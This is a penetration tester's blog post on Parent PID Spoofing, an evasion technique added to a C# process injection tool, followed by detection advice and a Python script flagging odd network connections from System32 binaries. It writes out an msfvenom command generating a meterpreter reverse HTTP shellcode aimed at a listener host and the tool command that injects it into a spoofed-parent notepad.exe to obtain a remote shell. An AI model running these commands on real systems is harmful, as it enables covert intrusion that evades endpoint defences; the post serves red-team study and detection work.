Parent PID Spoofing

Renos Nikolaou
Nov 2 · 4 min read

While I was conducting my research on process injection techniques, I came across Chirag’s blog, where he wrote a C# tool implementing two process injection techniques: Vanilla Injection and DLL Injection.

I decided to contribute to his project by adding the process hollowing technique and an evasion technique called Parent PID Spoofing, for two main reasons:

  1. To improve my C# skills, leveraging Windows APIs.
  2. To do in-depth research on process injection.

This post should be considered Part IV of Chirag’s Process Injection series, so I will follow the same writing structure.

What is Parent Process Identifier (PID) Spoofing?

Starting with Windows Vista, the CreateProcess Windows API function, and specifically its lpStartupInfo parameter, can be used to start an application (the child process) while letting the caller choose which process is recorded as its parent; an adversary can abuse this to spoof the parent. (e.g. As shown below, the parent process iexplore.exe with PID 3224 spawned notepad.exe as a child process with PID 6968.)

For the purpose of the Parent PID Spoofing evasion technique, 5 Windows APIs are used:

Overview of Parent PID Spoofing

Parent PID Spoofing is an evasion technique used by malware and attackers. It utilizes the CreateProcess Microsoft API to launch a child process under a chosen parent, then executes arbitrary code by injecting shellcode, a Dynamic-Link Library (DLL) or a Portable Executable (PE) into that child process, thus evading some defenses such as EDR and Anti-Virus products.

Find below the steps I followed while adding the Parent PID Spoofing evasion technique:

  1. The first API call, InitializeProcThreadAttributeList, initializes the attribute list and allocates the memory required for the attribute.
  2. OpenProcess is used to obtain a handle to the target (parent) process.
  3. UpdateProcThreadAttribute is called to set the parent process handle on the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.
  4. The last step is to call CreateProcess with a new flag, EXTENDED_STARTUPINFO_PRESENT, in the dwCreationFlags parameter; this flag enables the caller to pass a pointer to a STARTUPINFOEX structure (which carries the attribute list) instead of a plain STARTUPINFO.

Demo

Currently, Parent PID Spoofing supports 3 process injection techniques (vanilla process injection, DLL injection and process hollowing); for this demonstration I will use vanilla process injection with shellcode in C format.

The tool can be found in the GitHub repo.

Required parameters:

  • /ppath: The path of the executable that will be started as the child process.
  • /path: The file containing the MSFVenom shellcode.
  • /parentproc: The parent process binary name.
  • /f: The format of the shellcode that was generated.
  • /t: The evasion technique that you want to use.

Generate a reverse HTTP shellcode using MSFVenom. (Feel free to use any tool you want: Cobalt Strike, Donut, etc.)

msfvenom -p windows/meterpreter/reverse_http exitfunc=thread LHOST=10.10.10.10 LPORT=80 -b "\x00" -f c
ProcessInjection.exe /ppath:"c:\windows\system32\notepad.exe" /path:"c:\users\user\desktop\shcode.txt" /parentproc:explorer /f:c /t:5

The screenshot shows that the tool found the parent process ID (explorer.exe, PID 4148), spawned notepad.exe (PID 9692) as a child process and then injected the MSFVenom reverse HTTP shellcode into the child process.

Got a meterpreter reverse HTTP shell with PID 9692.

Detection

Monitor Windows API calls that create processes with extended startup information, and calls used to update process creation attributes, such as CreateProcess and UpdateProcThreadAttribute. Also monitor processes, especially those running from c:\Windows\System32\* or c:\Windows\SysWOW64\*, for abnormal behaviour such as opening network connections.
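As an added example (not part of the original post or the tool), the following Python script applies the second detection idea above to constructed Sysmon-style events: it flags network connections (Event ID 3) made by binaries under System32/SysWOW64 that are not expected to open sockets, and joins each hit with its process-create event (Event ID 1) so the analyst sees the recorded parent, which is exactly the field PPID spoofing falsifies. The sample events, field names and the small allowlist are assumptions modelled on the demo above.

```python
"""Flag network connections from unexpected System32/SysWOW64 binaries (Sysmon-style events)."""
from pathlib import PureWindowsPath

# Constructed sample events modelled on the demo above: notepad.exe (PID 9692) recorded
# with explorer.exe as parent, then calling out to 10.10.10.10:80. Not real telemetry.
# Sysmon Event ID 1 = process create, Event ID 3 = network connection.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4148, "Image": r"C:\Windows\explorer.exe",
     "ParentProcessId": 1000, "ParentImage": r"C:\Windows\System32\userinit.exe"},
    {"EventID": 1, "ProcessId": 9692, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 4148, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1204, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 3, "ProcessId": 1204, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "13.107.4.50", "DestinationPort": 443},
    {"EventID": 3, "ProcessId": 9692, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "10.10.10.10", "DestinationPort": 80},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Constructed allowlist (assumption): system binaries that legitimately open sockets.
EXPECTED_NETWORK_BINARIES = {"svchost.exe", "lsass.exe", "spoolsv.exe", "wininit.exe"}


def in_system_dir(image: str) -> bool:
    """True if the image lives directly in System32 or SysWOW64 (case-insensitive)."""
    return str(PureWindowsPath(image).parent).lower() in SYSTEM_DIRS


def find_suspicious_connections(events):
    """Return one alert per network connection from an unexpected system binary,
    joined with the recorded (possibly spoofed) parent from its process-create event."""
    creates = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    alerts = []
    for e in events:
        if e["EventID"] != 3 or not in_system_dir(e["Image"]):
            continue
        if PureWindowsPath(e["Image"]).name.lower() in EXPECTED_NETWORK_BINARIES:
            continue
        create = creates.get(e["ProcessId"], {})
        alerts.append({
            "pid": e["ProcessId"], "image": e["Image"],
            "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
            "recorded_parent": create.get("ParentImage", "unknown"),
            "recorded_parent_pid": create.get("ParentProcessId"),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_connections(SAMPLE_EVENTS):
        print(alert)
```

Because the recorded parent (explorer.exe) looks legitimate, a rule keyed only on parent/child pairs would miss this; the network behaviour of the child is what gives it away.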

As shown above, notepad.exe is communicating with my Command and Control (Metasploit Framework).

Thanks for reading the post. Feedback is always welcome.

Also, thanks to my friends George Koumettou, Andrianos Sergides and Alexis Mansour, who helped and motivated me to write this post.

Follow me on Twitter: https://twitter.com/r3n_hat

Written by Renos Nikolaou
CyberSecurity enthusiast, Penetration Tester. OSCE, OSCP, OSWP, eCPTX, eWPTX, CEH Certified. Twitter: @r3n_hat
